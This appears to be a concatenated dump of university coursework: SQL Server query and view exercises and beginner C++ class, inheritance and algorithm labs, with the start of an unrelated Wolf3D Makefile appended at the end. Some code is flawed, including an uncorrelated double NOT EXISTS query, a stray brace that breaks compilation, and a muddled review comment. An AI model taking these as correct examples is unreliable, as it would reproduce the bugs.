SELECT A.Sno,A.Sname,A.Sdept FROM Student A,Student B WHERE A.Sdept=B.Sdept AND B.Sname='李勇'
-- Students who took course 2: subquery vs. join formulation.
SELECT Sname,Sdept
FROM Student
WHERE Sno IN
(SELECT Sno FROM SC WHERE Cno='2')
SELECT Sname,Sdept FROM Student,SC WHERE Student.Sno=SC.Sno AND SC.Cno='2'
-- Students who took the course named 数据库: nested subqueries vs. join.
SELECT Sno, Sname
FROM Student
WHERE Sno IN
(SELECT Sno
FROM SC
WHERE Cno IN
(SELECT Cno
FROM Course
WHERE Cname = '数据库'))
SELECT Student.Sno,Student.Sname FROM Student,SC,Course WHERE SC.Cno=Course.Cno AND Course.Cname='数据库' AND SC.Sno=Student.Sno;
INSERT INTO Student VALUES('201215153','王敏','女',10,'MA')
-- Non-CS students not older than every CS student: ALL vs. MIN.
SELECT Sname,Sage FROM Student WHERE Sdept!='CS' AND Sage<=ALL(SELECT Sage FROM Student WHERE Sdept='CS') -- both != and <> are valid
SELECT Sname,Sage FROM Student WHERE Sdept<>'CS' AND Sage <= (SELECT MIN(Sage) FROM Student WHERE Sdept='CS')
-- Correlated EXISTS: students enrolled in course 1.
SELECT Sname,Sdept FROM Student WHERE EXISTS (SELECT * FROM SC WHERE SC.Sno=Student.Sno AND Cno='1')
SELECT Sno, Sname, Sdept FROM Student A WHERE EXISTS (SELECT * FROM Student B WHERE B.Sdept=A.Sdept AND B.Sname='李勇');
-- Double NOT EXISTS (relational division pattern).
SELECT Sname,Sdept FROM Student WHERE NOT EXISTS
(SELECT * FROM Course WHERE NOT EXISTS
(SELECT * FROM SC,Student,Course WHERE SC.Sno=Student.Sno AND SC.Cno=Course.Cno) )
SELECT Sname,Sdept FROM Student WHERE NOT EXISTS (SELECT * FROM Course WHERE NOT EXISTS (SELECT * FROM SC,Student,Course WHERE SC.Sno=Student.Sno AND SC.Cno=Course.Cno))
SELECT * FROM Student WHERE Sdept='CS' UNION SELECT * FROM Student WHERE Sage <=20 -- UNION merges the two result sets (duplicates removed)
SELECT * FROM Student WHERE Sdept='CS' OR Sage<=20
SELECT * FROM Student WHERE Sdept='CS' AND Sage<20;
<file_sep>/CPlus_Source/Shiyan2/person_2.h
#pragma once
#include <iostream>
#include <cstring>
using namespace std;
// Person record: fixed-size name buffer, age, and sex stored as an int code
// (0 = 'm', 1 = 'f'). Implementations are in person_2.cpp.
class Person_2
{
private:
char m_strName[20];
int m_nAge;
int m_nSex; // 0 for male, 1 for female
public:
Person_2();// default constructor
Person_2(const char *name, int age, char sex); // initialising constructor
Person_2(const Person_2 &p); // copy constructor
~Person_2() // destructor (traces destruction order)
{
cout << "Now destroying the instance of Person_2" << endl;
}
void SetName(const char *name);
void SetAge(int age);
void setSex(char sex);
char* GetName();
int GetAge();
char GetSex();
void ShowPerson_2(); // print name, age and sex
};
int main_person_2();<file_sep>/CPlus_Source/Chapter3/3_3_3.h
#pragma once
#include<iostream>
using namespace std;
// Newton's method for the square root of a positive number.
void main_3_3_3() {
const float EPSILON = 1E-5; // convergence threshold
float num, root, pre;
cout << "请输入一个正整数:";
cin >> num;
if (num <= 0) cout << "???" << endl;
else {
root = 1; // initial guess
do {
pre = root;
// Newton iteration: root' = (num/root + root) / 2
root = (num / root + root) / 2;
} while (pre - root > EPSILON || root - pre > EPSILON); // |pre - root| > EPSILON; subtraction binds tighter than comparison
cout << "The root of " << num << " is " << root << endl;
}
}
#include "pch.h"
#include "Person_1.h"
using namespace std;
// Default constructor: placeholder name "XXX", age 0, sex code 0 (male).
Person_1::Person_1() : m_nAge(0), m_nSex(0){ // constructor
strcpy_s(m_strName, "XXX");
}
// Sex is stored as an int code: 0 for 'm', 1 otherwise.
Person_1::Person_1(const char *name, int age, char sex) : m_nAge(age), m_nSex(sex == 'm' ? 0 : 1){ // constructor
strcpy_s(m_strName, name);
}
Person_1::Person_1(const Person_1 &p) : m_nAge(p.m_nAge), m_nSex(p.m_nSex){ // copy constructor
strcpy_s(m_strName, p.m_strName);
}
void Person_1::SetName(const char *name){
strcpy_s(m_strName, name);
}
void Person_1::SetAge(int age){
m_nAge = age;
}
void Person_1::setSex(char sex){
m_nSex = sex == 'm' ? 0 : 1;
}
const char* Person_1::GetName() const{
return m_strName;
}
int Person_1::GetAge() const{
return m_nAge;
}
// Decode the stored int back to a character ('m' or 'f').
char Person_1::GetSex() const{
return (m_nSex == 0 ? 'm' : 'f');
}
void Person_1::ShowMe() const{
cout << GetName() << '\t' << GetAge() << '\t' << GetSex() << '\t' << endl;
}
// Demo: default construction, setter/getter use, ctor initialisation.
int main_person_1()
{
Person_1 *p1, *p2; // two pointers to objects
p1 = new Person_1; // dynamically create a Person_1 (default ctor)
cout << "默认状态下, Person_1的三个变量: \t";
p1->ShowMe();
p1->SetAge(19); // assign via setters
p1->SetName("张三");
p1->setSex('m');
cout << "函数调用赋值后,Person_1的三个变量: \t";
cout << p1->GetName() << "\t" << p1->GetAge() << "\t" << p1->GetSex() << endl; // print via getters
p2 = new Person_1("李四", 19, 'm'); // dynamically create and initialise via ctor
cout << "构造函数初始化,Person_2的三个变量: \t";
p2->ShowMe();
delete p1; // release the object p1 points to
delete p2; // release the object p2 points to
return 0;
}
<file_sep>/CPlus_Source/Shiyan4/Timeworker.h
#pragma once
#include"Person.h"
#include<iostream>
// Hourly worker: base pay of 4000 plus 100 per recorded hour.
class Timeworker:public Person
{
public:
Timeworker(int id0, const char* name0, float time0); // needs id, name and hours
~Timeworker();
virtual void calculation(); // salary = 4000 + time * 100
virtual void display(); // prints id, name and salary
private:
float time; // hours worked
};
Timeworker::Timeworker(int id0, const char* name0, float time0)
{
id = id0;
strcpy_s(name, name0);
time = time0;
}
Timeworker::~Timeworker()
{
}
void Timeworker::calculation() {
salary = 4000 + time * 100;
}
void Timeworker::display() {
std::cout << "这个id为" << id << "名字为" << name << "的工资是:" << salary << std::endl;
}
# Course Code
这是大学课程的一些实验源码。
C++/SQL source code for Foshan University (FOSU) course experiments
佛山科学技术学院 C++/SQL 课程实验源代码
<file_sep>/CPlus_Source/Shiyan3/3_2.h
#pragma once
#include <iostream>
using namespace std;
// Teaching demo for constructor/destructor ordering: B derives from A and
// also contains an A member, so constructing B(m, n, l) runs A(m) (base),
// then A(n) (member a), then B's body; destruction runs in reverse.
// NOTE(review): A() and B() print x/y before initialising them, and the
// destructors of default-constructed objects print indeterminate values --
// presumably intentional for the demo; confirm before "fixing".
class A
{
public:
A()
{
cout << "Constructor1_A" << x << endl;
}
A(int m) : x(m)
{
cout << "Constructor2_A" << x << endl;
}
~A()
{
cout << "Destructor_A" << x << endl;
}
private:
int x;
};
class B : public A
{
public:
B()
{
cout << "Constructor1_B" << y << endl;
}
// A(m) initialises the base; a(n) the member; y(l) the own field.
B(int m, int n, int l) : A(m), a(n), y(l)
{
cout << "Constructor2_B" << y << endl;
}
~B()
{
cout << "Destructor_B" << y << endl;
}
private:
A a;
int y;
};
int main_3_2()
{
B b2(5, 6, 7);
return 0;
}
<file_sep>/CPlus_Source/Shiyan2/const_text.cpp
#include"pch.h"
#include"const_text.h"
// Non-const overload: selected when print() is called on a non-const R.
void R::print()
{
cout << "In print:" << " R1 = " << R1 << endl;
}
// Const overload: selected when print() is called on a const R.
void R::print() const
{
cout << "In print _const: " << " R1 = " << R1 << endl;
}
// Demo: the const object a1 binds to the const overload, a2 to the other.
int main_const_text() {
const R a1;
a1.print();
R a2;
a2.print();
return 0;
}
#pragma once
#include <iostream>
using namespace std;
// Bank account demo class holding a single running balance.
class ACCOUNT
{
private:
	float balance; // current balance of this account

public:
	// Open an account with an initial balance of `amount`.
	ACCOUNT(float amount) : balance(amount) {}

	// Add `amount` to the balance.
	void deposit(float amount)
	{
		balance = balance + amount;
	}

	// Try to take `amount` out of the account.
	// Returns 1 on success, 0 when the balance is insufficient.
	int withdraw(float amount)
	{
		if (amount <= balance)
		{
			balance -= amount;
			return 1;
		}
		return 0;
	}

	// Current balance of the account.
	float get_balance()
	{
		return balance;
	}
};
// Demo driver for ACCOUNT.
int main_1_4_1() {
// open two accounts
ACCOUNT acc1(500);
ACCOUNT acc2(1500);
// deposits and withdrawals
// NOTE(review): the withdraw() return values are ignored here, so failed
// withdrawals (e.g. 700 from acc1's 755.5? no -- 700 succeeds; the later
// ones may not) pass silently; presumably intentional for the demo.
acc1.deposit(255.5);
acc2.deposit(500);
acc2.withdraw(700);
acc1.withdraw(700);
acc2.withdraw(350);
// query the balances
cout << "acc1_balance: " << acc1.get_balance() << endl;
cout << "acc2_balance: " << acc2.get_balance() << endl;
return 0;
}
#pragma once
#include<iostream>
using namespace std;
// Reads three scores, rounds their mean to the nearest integer, and prints
// the scholarship tier.
// Fix: (math + phys + chem) / 3 is *integer* division, so the quotient was
// already floored before + 0.5 was applied -- the intended round-to-nearest
// never happened (e.g. 90, 90, 89 gave 89 instead of 90). Divide by 3.0.
void main_3_2_4() {
	int math, phys, chem;
	int average;
	float scholarship; // scholarship amount awarded
	cout << "Enter scores of math, phys, and chem : ";
	cin >> math >> phys >> chem;
	average = (math + phys + chem) / 3.0 + 0.5; // +0.5 then truncation == round to nearest
	if (average >= 90) {
		cout << "Excellent!" << endl;
		scholarship = 120.00;
	}
	else if (average >= 60) {
		cout << "OK!" << endl;
		scholarship = 60.00;
	}
	else
	{
		cout << "false!" << endl;
		// NOTE(review): the failing branch awards the same 60.00 as the
		// "OK" tier, which looks like a copy-paste slip (0.00 expected);
		// confirm against the exercise text before changing the amount.
		scholarship = 60.00;
	}
	cout << "Your scholarship is " << scholarship << endl;
}
<file_sep>/CPlus_Source/Shiyan2/this_text.h
#pragma once
#include <iostream>
using namespace std;
// Demo of the `this` pointer: x, this->x and (*this).x are the same member,
// and `this` equals the address of the object the method was called on.
class Test
{
int x;
public:
Test(int = 0);
void print() const;
};
Test::Test(int a) : x(a) // constructor
{}
void Test::print() const
{
cout << "x = " << x
<< "\nthis->x = " << this->x
<< "\n(*this).x = " << (*this).x
<< "\nthis = " << this << endl;
}
int main_this_text()
{
Test testObject(12);
testObject.print();
// &testObject matches the `this` printed inside print().
cout << "&testObject = " << &testObject << endl;
return 0;
}
<file_sep>/CPlus_Source/Chapter3/3_3_2.h
#pragma once
#include<iostream>
using namespace std;
// Menu loop: repeats until the user enters 0.
void main_3_3_2() {
int choice = 1;
while (choice != 0) {
std::cout << "请做出选择:" << std::endl << "1.Apple" << std::endl << "2.Banana" << std::endl << "0.Exit" << std::endl;
std::cin >> choice;
switch (choice)
{
case 0:break; // break leaves the switch; the while condition then ends the loop
case 1:std::cout << "You choose Apple" << std::endl; break; break; // break only exits the switch -- no number of breaks here leaves the while
case 2:std::cout << "You choose Banana" << std::endl; break;
default:
std::cout << "You choose what???" << std::endl;
break;
}
}
}
}<file_sep>/CPlus_Source/Shiyan3/person.cpp
#include"pch.h"
#include "person.h"
// Default constructor: initialiser list sets m_nAge = 0 and m_nSex = 0.
Person::Person() : m_nAge(0), m_nSex(0)// constructor; the initialiser list performs the member initialisation
{
strcpy_s(m_strName, "XXX");
}
// Sex code: 0 for male ('m'), 1 for female; set via the initialiser list.
Person::Person(const char *name, int age, char sex) : m_nAge(age), m_nSex(sex == 'm' ? 0 : 1)// constructor
{
strcpy_s(m_strName, name);
}
Person::Person(const Person &p) : m_nAge(p.m_nAge), m_nSex(p.m_nSex)// copy constructor
{
strcpy_s(m_strName, p.m_strName);
}
void Person::SetName(char *name)
{
strcpy_s(m_strName, name);
}
void Person::SetAge(int age)
{
m_nAge = age;
}
void Person::setSex(char sex)
{
m_nSex = sex == 'm' ? 0 : 1;
}
char* Person::GetName()
{
return m_strName;
}
int Person::GetAge()
{
return m_nAge;
}
// Decode the stored int back to 'm' or 'f'.
char Person::GetSex()
{
return (m_nSex == 0 ? 'm' : 'f');
}
// Prints name, age and sex (no trailing newline -- callers continue the line).
void Person::ShowMe()
{
cout << GetName() << '\t' << GetAge() << '\t' << GetSex() << '\t';
}
<file_sep>/CPlus_Source/Shiyan3/employee.h
#pragma once
#include "person.h"
class Employee : public Person // employee class: a Person with a department and a salary
{
char m_strDept[20]; // department the employee works in
float m_fSalary; // monthly salary
public:
Employee();
Employee(const char *name, int age, char sex, const char *dept, float salary);
Employee(Employee &e);
~Employee() // traces destruction order relative to the Person base
{
cout << "Now destroying the instance of Employee" << endl;
}
void SetDept(const char *dept);
void SetSalary(float salary);
char* GetDept();
float GetSalary();
void ShowMe(); // display the employee's information (hides Person::ShowMe)
};
<file_sep>/CPlus_Source/Shiyan4/4_5.cpp
#include"pch.h"
#include"4_5.h"
#include<iostream>
#include"Employee.h"
#include"Person.h"
#include"Salesman.h"
#include"Timeworker.h"
using namespace std;
// Polymorphism demo: the same Person* base pointer is re-aimed at an
// Employee, a Salesman and a Timeworker; the virtual calculation() and
// display() calls dispatch to each derived class's own implementation.
void main_4_5() {
	Person *p1;
	Employee e(1, "employee");
	Salesman s(2, "salesman", 2500);
	Timeworker t(3, "timeworker", 300);
	p1 = &e;
	p1->calculation();
	p1->display();
	std::cout << "End employee!" << std::endl;
	p1 = &s;
	p1->calculation();
	p1->display();
	std::cout << "End salesman!" << std::endl;
	p1 = &t;
	p1->calculation();
	p1->display();
	std::cout << "End timeworker!" << std::endl;
}<file_sep>/CPlus_Source/Shiyan3/birthday.cpp
#include"pch.h"
#include"birthday.h"
#include<string.h>
using namespace std;
// Date constructor: stores year/month/day as-is (no validation).
Date::Date(int y, int m, int d)
{
	year = y;
	month = m;
	day = d;
}
// Prints the stored date as a birthday, e.g. "生日为1999年1月2日".
void Date::display()
{
	cout << "生日为" << year << "年" << month << "月" << day << "日" << endl;
}
// Person constructor: copies the name and echoes it immediately.
Person::Person(char n[])
{
	strcpy_s(name, n);
	cout << "姓名为:" << name << endl;
}
// Student constructor: forwards the name to the Person base, then
// stores id and score.  The extra strcpy_s re-copies the inherited name.
Student::Student(int i, int s, char n[]) :Person(n)
{
	id = i;
	score = s;
	strcpy_s(name, n);
}
// Prints the student id and score.
void Student::display()
{
	cout << "学号为" << id << " " << "成绩为" << score << endl;
}
<file_sep>/CPlus_Source/Shiyan3/main_1.cpp
#include"pch.h"
#include "employee.h"
using namespace std;
// Inheritance demo: a default-constructed Employee, a fully-initialized
// one, and a direct call to the base-class accessor GetName() through
// the derived object.
int main_1()
{
	Employee emp1;
	emp1.ShowMe();
	Employee emp2("Zhangli", 40, 'f', "图书馆", 2000);
	emp2.ShowMe();
	cout << "调用基类GetName()返回值为: " << emp2.GetName() << endl;
	return 0;
}
<file_sep>/CPlus_Source/Chapter6/bubble.h
#pragma once
#include<iostream>
using namespace std;
// Sorts data[0..length-1] in ascending order with bubble sort.
// Each outer pass floats the smallest remaining element up to
// data[segment]; a pass that performs no swaps proves the array is
// already sorted, so the function returns early.
void bubble(int data[], int length) { // array base address, element count
	int segment; // first index of the still-unsorted portion
	int loop; // scans the unsorted portion from the bottom up
	int temp; // scratch variable used while swapping
	bool swapped; // early-exit flag: no swaps in a pass => sorted
	// Shrink the unsorted portion one element per pass.
	for (segment = 0; segment <= length - 2; segment++) {
		swapped = false;
		// Float the smallest element of data[segment..length-1] to data[segment].
		for (loop = length - 2; loop >= segment; loop--) {
			if (data[loop + 1] < data[loop]) { // smaller element below: bubble it up one step
				temp = data[loop];
				data[loop] = data[loop + 1];
				data[loop + 1] = temp;
				swapped = true;
			}
		}
		if (!swapped) // nothing moved: the remaining portion is already ordered
			return;
	}
	return;
}
// Reads max_nums integers from stdin, sorts them with bubble(), and
// prints them tab-separated in ascending order.
void main_bubble() {
	const int max_nums = 8; // number of values to read and sort
	int data[max_nums]; // the array to be sorted
	// Read the input values.
	for (int i = 0; i < max_nums; i++) {
		std::cin >> data[i];
	}
	// Sort the array in place.
	bubble(data, max_nums);
	// Print the sorted result.
	for (int i = 0; i < max_nums; i++) {
		std::cout << data[i] << "\t";
	}
	return;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_2.sql
-- 实验二
USE xskc;
-- 导入数据库文件
INSERT INTO Student VALUES('201215121','李勇','男',20,'CS')
INSERT INTO Student VALUES('201215122','刘晨','女',19,'CS')
INSERT INTO Student VALUES('201215131','刘晨2','女',19,'CS')
INSERT INTO Student VALUES('201215132','刘','女',19,'CS') --插入多几个做编码比较
INSERT INTO Student VALUES('201215141','l','女',19,'CS')
INSERT INTO Student VALUES('201215142','ll','女',19,'CS')
INSERT INTO Student VALUES('201215143','lll','女',19,'CS')
INSERT INTO Student VALUES('201215123','王敏','女',18,'MA')
INSERT INTO Student VALUES('201215125','张立','男',19,'IS')
INSERT INTO Student VALUES('201331001','欧阳原野','男',17,'CS')
INSERT INTO Student VALUES('201439002','刘小莉','女',16,'CS')
INSERT INTO Course VALUES('1','数据库','5',4) --注意在此处由于先修课须存在的约束,插入前须先置NULL
INSERT INTO Course VALUES('2','数学',NULL,2)
INSERT INTO Course VALUES('3','信息系统','1',4)
INSERT INTO Course VALUES('4','操作系统','6',3)
INSERT INTO Course VALUES('5','数据结构','7',4)
INSERT INTO Course VALUES('6','数据处理',NULL,2)
INSERT INTO Course VALUES('7','C语言',6,4)
INSERT INTO Course VALUES('8','DB_Design',1,2)
UPDATE Course SET Cpno='8' WHERE Cno='1' --修正先修课的数据
INSERT INTO SC VALUES('201215121','1',92)
INSERT INTO SC VALUES('201215121','2',85)
INSERT INTO SC VALUES('201215121','3',88)
INSERT INTO SC VALUES('201215122','2',90)
INSERT INTO SC VALUES('201215122','3',80)
INSERT INTO SC VALUES('201331001','1',55)
INSERT INTO SC VALUES('201331001','2',90)
INSERT INTO SC VALUES('201331001','3',80)
INSERT INTO SC VALUES('201439002','1',69)
INSERT INTO SC VALUES('201215125','1',NULL)
-- END 导入数据库文件
SELECT * FROM Student;
SELECT * FROM SC;
SELECT * FROM Course;
SELECT Sname,Sno,Sdept FROM Student;
SELECT Sno,Sname,2018-Sage as 'Birthday' FROM Student;
SELECT Sno,Sname,2018-Sage 'Birthday',LOWER(Sdept) Sdept FROM Student;
SELECT Sno, Sname FROM Student WHERE Sdept='MA';
SELECT DISTINCT Sno FROM SC WHERE Grade<60;
SELECT Sname, Sage FROM Student WHERE Sage<20;
SELECT Sname, Sage FROM Student WHERE Sage>=18 AND Sage<=22;
SELECT Sname, Sage FROM Student WHERE Sage BETWEEN 18 AND 22;
SELECT Sname, Sage FROM Student WHERE Sage NOT BETWEEN 18 AND 20;
SELECT Sno, Sname, Ssex FROM Student WHERE Sdept IN ('CS', 'MA', 'IS');
SELECT Sno, Sname, Ssex FROM Student WHERE Sdept='CS' OR Sdept='MA' OR Sdept='IS';
SELECT Sname, Ssex FROM Student WHERE Sdept NOT IN ('IS', 'MA', 'CS');
SELECT Sname, Sno, Ssex FROM Student WHERE Sname LIKE '刘%';
SELECT Sname, Sdept FROM Student WHERE Sname LIKE '刘___';
SELECT Sname, Sage FROM Student WHERE Sname NOT LIKE '刘%';
SELECT Cno, Ccredit FROM Course WHERE Cname LIKE 'DB\_DESIGN' ESCAPE '\';
SELECT * FROM Course WHERE Cname LIKE 'DB\_%DESIG_'ESCAPE'\'; -- 查询以"DB_"开头,且倒数字符为“DESIG(N)”的课程
SELECT Sno, Cno FROM SC WHERE Grade IS NULL;
SELECT Sno, Cno FROM SC WHERE Grade IS NOT NULL;
SELECT Sno, Grade FROM SC WHERE Cno='3' ORDER BY Grade DESC;
SELECT * FROM Student ORDER BY Sdept ASC, Sage DESC;
SELECT COUNT(*) FROM Student;
SELECT COUNT(*) count_name FROM Student;
SELECT COUNT(DISTINCT Sno) FROM SC;
SELECT AVG(Grade) FROM SC WHERE Cno='2'; --应该是88.3333..但由于是int,暂时忽略
SELECT MAX(Grade) FROM SC WHERE Cno='2';
SELECT SUM(Ccredit) FROM SC,Course WHERE Sno='201215122' AND SC.Cno=Course.Cno;
SELECT Cno , COUNT(Sno) CntSno FROM SC GROUP BY Cno;
SELECT Sno FROM SC GROUP BY Sno HAVING COUNT(Cno)>2;
--END实验二<file_sep>/CPlus_Source/Shiyan4/4_5.h
#pragma once
void main_4_5();<file_sep>/CPlus_Source/Shiyan4/Salesman.h
#pragma once
#include"Person.h"
#include<iostream>
// Salesman: an employee paid a fixed base plus commission on sales.
class Salesman:public Person
{
public:
	Salesman(int id0, const char* name0, float sales0); // a Salesman needs an id, a name and a sales figure
	~Salesman();
	virtual void calculation();
	virtual void display();
private:
	float sales; // total sales amount used to compute the commission
};
Salesman::Salesman(int id0, const char* name0, float sales0)
{
	id = id0;
	strcpy_s(name, name0);
	sales = sales0;
}
Salesman::~Salesman()
{
}
// Pay = 4000 base salary + 4% commission on sales.
void Salesman::calculation() {
	salary = 4000 + sales * 0.04f;
}
// Prints id, name and the computed salary.
void Salesman::display() {
	std::cout << "这个id为" << id << "名字为" << name << "的工资是:" << salary << std::endl;
}
<file_sep>/CPlus_Source/Shiyan4/Shiyan4.cpp
// Shiyan4.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include "pch.h"
#include <iostream>
#include"4_1.h"
#include"4_2.h"
#include"4_3.h"
#include"cixu.h"
#include"4_5.h"
// Entry point: the commented-out calls are the other exercises of this
// project; only experiment 4_5 (polymorphism demo) is currently run.
int main()
{
	//std::cout << "Hello World!\n";
	//main_4_1();
	//main_4_2();
	//main_4_3();
	//main_cixu();
	main_4_5();
	std::cout << "20160310333黄慧琳!\n";
	return 0;
}
// 运行程序: Ctrl + F5 或调试 >“开始执行(不调试)”菜单
// 调试程序: F5 或调试 >“开始调试”菜单
// 入门提示:
// 1. 使用解决方案资源管理器窗口添加/管理文件
// 2. 使用团队资源管理器窗口连接到源代码管理
// 3. 使用输出窗口查看生成输出和其他消息
// 4. 使用错误列表窗口查看错误
// 5. 转到“项目”>“添加新项”以创建新的代码文件,或转到“项目”>“添加现有项”以将现有代码文件添加到项目
// 6. 将来,若要再次打开此项目,请转到“文件”>“打开”>“项目”并选择 .sln 文件
<file_sep>/CPlus_Source/Chapter4/4_2.h
#pragma once
#include<iostream>
using namespace std;
// Returns true when `year` is a leap year in the Gregorian calendar:
// divisible by 4, except century years, which must be divisible by 400.
bool is_run_year(int year) {
	return year % 4 == 0 && (year % 100 != 0 || year % 400 == 0);
}
// Returns the number of days in `month` of `year`.
// For an invalid month it prints an error and returns 0; previously the
// default branch fell off the end of this value-returning function,
// which is undefined behavior.
int month_days(int year, int month) {
	switch (month)
	{
	case 1: return 31;
	case 2:
		// February depends on whether the year is a leap year.
		return is_run_year(year) ? 29 : 28;
	case 3: return 31;
	case 4: return 30;
	case 5: return 31;
	case 6: return 30;
	case 7: return 31;
	case 8: return 31;
	case 9: return 30;
	case 10: return 31;
	case 11: return 30;
	case 12: return 31;
	default:
		std::cout << "???" << std::endl << "!" << std::endl;
		return 0; // invalid month
	}
}
// Reads a date (year month day) from stdin and prints the day's ordinal
// number within its year; prints "???" for any invalid input.
// Only 4-digit years (1000-9999) are accepted.
void main_4_2() {
	int year, month, day, sum = 0;
	cout << "year month day : ";
	cin >> year >> month >> day;
	// Validate year, month AND day; the `0 < day` test was previously
	// missing, so day 0 or a negative day slipped through validation.
	if (999 < year && year < 10000 && 0 < month && month < 13 && 0 < day) {
		// Sum the lengths of every complete month before `month`.
		for (int i = 1; i < month; i++) {
			sum += month_days(year, i);
		}
		// Reject a day beyond the end of the chosen month.
		if (day > month_days(year, month)) {
			cout << "???";
			return;
		}
		sum += day;
		cout << "days: " << sum << endl;
	}
	else {
		cout << "???";
	};
	return;
}<file_sep>/CPlus_Source/Shiyan1/yuan.h
#pragma once
#include<iostream>
using namespace std;
// Reads a circle's radius and prints its circumference and area,
// using PI = 3.14 as required by the exercise.
int main_yuan(){
	double r, C, S;
	const double PI = 3.14;
	cout << "学号:20160310321\t" << "学生:林上满" << endl;
	cout << "请输入圆的半径(圆周率取3.14):";
	cin >> r;
	C = 2 * PI * r; //compute the circumference
	S = PI * r * r; //compute the area
	cout << "圆->周长为:" << C << endl;
	cout << "圆->面积为:" << S << endl;
	return 0;
}
<file_sep>/CPlus_Source/Shiyan3/birthday.h
#pragma once
#include<iostream>
// Simple date holder used as the birthday in this exercise.
class Date {
public:
	Date(int y, int m, int d);
	void display();	// prints the date as a birthday
protected:
	int year, month, day;
};
// Base class carrying only the person's name.
class Person {
public:
	Person(char n[]);
protected:
	char name[50];
};
// Student extends Person with an id and a score.
class Student :public Person {
public:
	Student(int i, int s, char n[]);
	void display();	// prints id and score
protected:
	int id, score;
};
<file_sep>/CPlus_Source/Shiyan3/employee.cpp
#include"pch.h"
#include "employee.h"
// Default constructor: placeholder department "xxxx", salary 0.
Employee::Employee() : m_fSalary(0.0)
{
	strcpy_s(m_strDept, "xxxx");
}
// Full constructor: forwards the personal data to the Person base.
Employee::Employee(const char *name, int age, char sex, const char *dept, float salary)
	: Person(name, age, sex), m_fSalary(salary)
{
	strcpy_s(m_strDept, dept);
}
// Copy constructor: rebuilds the base part through its accessors.
Employee::Employee(Employee &e) : Person(e.GetName(), e.GetAge(), e.GetSex()),
	m_fSalary(e.m_fSalary)
{
	strcpy_s(m_strDept, e.m_strDept);
}
void Employee::SetDept(const char *dept)
{
	strcpy_s(m_strDept, dept);
}
void Employee::SetSalary(float salary)
{
	m_fSalary = salary;
}
char* Employee::GetDept()
{
	return m_strDept;
}
float Employee::GetSalary()
{
	return m_fSalary;
}
// Prints the base Person fields first, then department and salary.
void Employee::ShowMe()
{
	Person::ShowMe();
	cout << m_strDept << "\t" << m_fSalary << endl;
}
<file_sep>/CPlus_Source/README.md
# CPlus_Source
Fosu University Course C++ Code Source
佛山科学技术学院 C++课程实验源代码
# How to use
Clone this repository and open `CPlus_Source.sln` in Visual Studio (C++).
<file_sep>/CPlus_Source/Shiyan1/ju.h
#pragma once
#include<iostream>
using namespace std;
// Reads a rectangle's length and width and prints its area.
int main_ju(){
	double l, w, S;
	cout << "学号:20160310321\t" << "学生:林上满" << endl;
	cout << "请输入矩形的长和宽(请用空格分开):";
	cin >> l >> w;
	S = l * w; //compute the area
	cout << "矩形的面积为:" << S << endl;
	return 0;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_5.sql
-- Experiment 5: views — creation, querying and updating through a view
-- NOTE(review): in SQL Server, CREATE VIEW must be the only statement in
-- its batch; run each CREATE VIEW separately (e.g. with GO) — confirm.
use xskc
-- Updatable view restricted to MA students; WITH CHECK OPTION rejects
-- inserts/updates that would leave the view's WHERE condition.
CREATE VIEW C_Student AS SELECT Sno,Sname,Sage,Sdept FROM Student WHERE Sdept='MA' WITH CHECK OPTION;
-- Three-table join view: each student's course names and grades.
CREATE VIEW Student_CR AS SELECT Student.Sno,Sname,Cname,Grade FROM Student,Course,SC WHERE Student.Sno=SC.Sno AND SC.Cno=Course.Cno
-- View with a computed column (birth year derived from age).
CREATE VIEW Student_birth(Sno,Sname,Sbirth) AS SELECT Sno,Sname,2018-Sage FROM Student
-- Querying through views vs. the base table directly.
SELECT * FROM Student_birth
SELECT * FROM Student WHERE Sdept='MA'
SELECT * FROM C_Student
SELECT Sname,Sage FROM C_Student WHERE Sage <20
SELECT Sname,Sage FROM Student WHERE Sdept='MA' AND Sage<20
SELECT * FROM Student_CR
SELECT Sno,Sname,Cname FROM Student_CR WHERE Grade>85
-- Updating the base table through the updatable view.
UPDATE C_Student SET Sname='黄海' WHERE Sno='201215153'
INSERT INTO C_Student VALUES('200215124','王海',20,'MA')
SELECT * FROM C_Student
SELECT * FROM Student
DELETE FROM C_Student WHERE Sno='200215124'
--END Experiment 5
<file_sep>/CPlus_Source/Shiyan2/person_1.h
#pragma once
#include <iostream>
#include <cstring>
using namespace std;
// Person with a fixed-size name buffer; sex is stored internally as an
// int code ('m' -> 0, otherwise 1) and decoded back by GetSex().
class Person_1{
private:
	char m_strName[20];
	int m_nAge;
	int m_nSex;
public:
	Person_1();// default constructor
	Person_1(const char *name, int age, char sex);	// constructor
	Person_1(const Person_1 &p);	// copy constructor
	~Person_1()	// destructor; announces destruction for lifetime tracing
	{
		cout << "Now destroying the instance of Person_1" << endl;
	}
	void SetName(const char *name);
	void SetAge(int age);
	void setSex(char sex);
	const char* GetName() const;
	int GetAge() const;
	char GetSex() const;
	void ShowMe() const;
};
int main_person_1();
| b5f440c3e1929d7b76350fed33bf39ef9674beb5 | [
"Markdown",
"C",
"C++",
"SQL"
] | 54 | C++ | FnEsc/Course-Code | 5734ac10bb2ebca3f7c8a9282784015599b0d505 | 7b5f3e828a9ef470004bd7b3edd4ed25ee6b5e4d |
refs/heads/master | <repo_name>jlamb916/Wolf3D<file_sep>/Makefile
# **************************************************************************** #
# #
# ::: :::::::: #
# Makefile :+: :+: :+: #
# +:+ +:+ +:+ #
# By: jolam <<EMAIL>> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2019/05/23 00:53:07 by jolam #+# #+# #
# Updated: 2019/05/24 17:25:17 by knguyen- ### ########.fr #
# #
# **************************************************************************** #
# Final binary name and the source files that compose it.
NAME = wolf3d
SRC = main.c\
	setup.c\
	map.c\
	move.c\
	calc.c\
	helper.c\
	hooks.c\
	draw_frame.c\
	strafe.c
# Object files mirror SRC inside $(OBJDIR).
OBJ = $(addprefix $(OBJDIR), $(SRC:.c=.o))
GCC = gcc -g -Wall -Werror -Wextra
# Local libft static library: archive, header path, link flags.
LIBFT = ./libft/libft.a
LIBINC = -I ./libft/includes
LIBLINK = -L ./libft -lft
# Bundled minilibx graphics library; links against OpenGL/AppKit on macOS.
# NOTE(review): the framework is normally spelled "OpenGL"/"AppKit"; this
# works only because macOS resolves framework names case-insensitively.
MLX = ./minilibx/libmlx.a
MLXINC = -I ./minilibx
MLXLINK = -L ./minilibx -lmlx -framework OpenGl -framework Appkit
SRCDIR = ./srcs/
INCDIR = ./includes/
